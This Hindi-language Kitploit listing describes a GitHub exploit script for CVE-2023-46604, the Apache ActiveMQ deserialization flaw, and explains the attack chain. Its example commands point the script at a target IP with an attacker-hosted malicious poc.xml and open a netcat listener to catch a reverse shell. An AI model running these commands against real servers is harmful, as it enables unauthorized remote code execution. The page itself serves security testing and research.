Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46604 — स्क्रिप्ट Apache ActiveMQ (CVE-2023-46604) में असुरक्षित डिसीरियलाइज़ेशन भेद्यता का शोषण करती है | Kitploit
उपकरण/GitHubGitHub/pulentoski/cve-2023-46604
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

स्क्रिप्ट Apache ActiveMQ (CVE-2023-46604) में असुरक्षित डिसीरियलाइज़ेशन भेद्यता का शोषण करती है

रिपॉजिटरी देखें
1132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

हमले का तकनीकी सारांश: CVE-2023-46604

स्क्रिप्ट Apache ActiveMQ (CVE-2023-46604) में एक असुरक्षित डिसीरियलाइज़ेशन भेद्यता का शोषण करती है ताकि लक्ष्य सर्वर पर रिमोट कोड निष्पादन प्राप्त किया जा सके। शोषण प्रक्रिया का विवरण

root@kitploit:~
भेद्यता का लक्ष्य:
    यह भेद्यता Apache ActiveMQ के OpenWire प्रोटोकॉल में मौजूद है।
    यह ऑब्जेक्ट्स के असुरक्षित डिसीरियलाइज़ेशन की अनुमति देता है, जिसका उपयोग सर्वर पर मनमाना कोड निष्पादित करने के लिए किया जा सकता है।

पूर्वापेक्षाएँ:
    ActiveMQ सर्वर तक नेटवर्क पहुंच।
    एक दुर्भावनापूर्ण XML फ़ाइल (poc.xml) जो लक्ष्य सर्वर के लिए सुलभ URL के माध्यम से उपलब्ध हो।

हमले के घटक:
    Python स्क्रिप्ट: ActiveMQ सर्वर पर दुर्भावनापूर्ण पेलोड भेजने की प्रक्रिया को स्वचालित करती है।
    XML फ़ाइल (poc.xml): इसमें एक Spring बीन होता है जो एक दुर्भावनापूर्ण कमांड (उदाहरण के लिए, रिवर्स शेल खोलना) का निष्पादन परिभाषित करता है।

हमले के चरण

root@kitploit:~
पेलोड तैयार करना:
    स्क्रिप्ट एक हेक्साडेसिमल संदेश बनाती है जिसमें शामिल है:
        जावा वर्ग का नाम: org.springframework.context.support.ClassPathXmlApplicationContext.
        दुर्भावनापूर्ण XML फ़ाइल का URL.
    पेलोड को बाइट्स के अनुक्रम में परिवर्तित किया जाता है जिसे OpenWire प्रोटोकॉल के माध्यम से भेजा जा सकता है।

पेलोड भेजना:
    स्क्रिप्ट निर्दिष्ट पोर्ट (डिफ़ॉल्ट 61616) पर ActiveMQ सर्वर के लिए एक TCP सॉकेट कनेक्शन खोलती है।
    सर्वर को दुर्भावनापूर्ण पेलोड भेजती है।

दुर्भावनापूर्ण कोड का निष्पादन:
    ActiveMQ सर्वर पेलोड में निर्दिष्ट ऑब्जेक्ट को डिसीरियलाइज़ करता है।
    असुरक्षित डिसीरियलाइज़ेशन के कारण, XML फ़ाइल में परिभाषित Spring बीन लोड और निष्पादित होता है।
    यह बीन सर्वर पर एक दुर्भावनापूर्ण कमांड (उदाहरण के लिए, रिवर्स शेल) निष्पादित करता है।

    _________________________________________________________

निष्पादन उदाहरण:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

यह स्क्रिप्ट स्पेनिश में कॉपी और संशोधित की गई थी:https://github.com/evkl1d/CVE-2023-46604.git

टूल डाउनलोड करें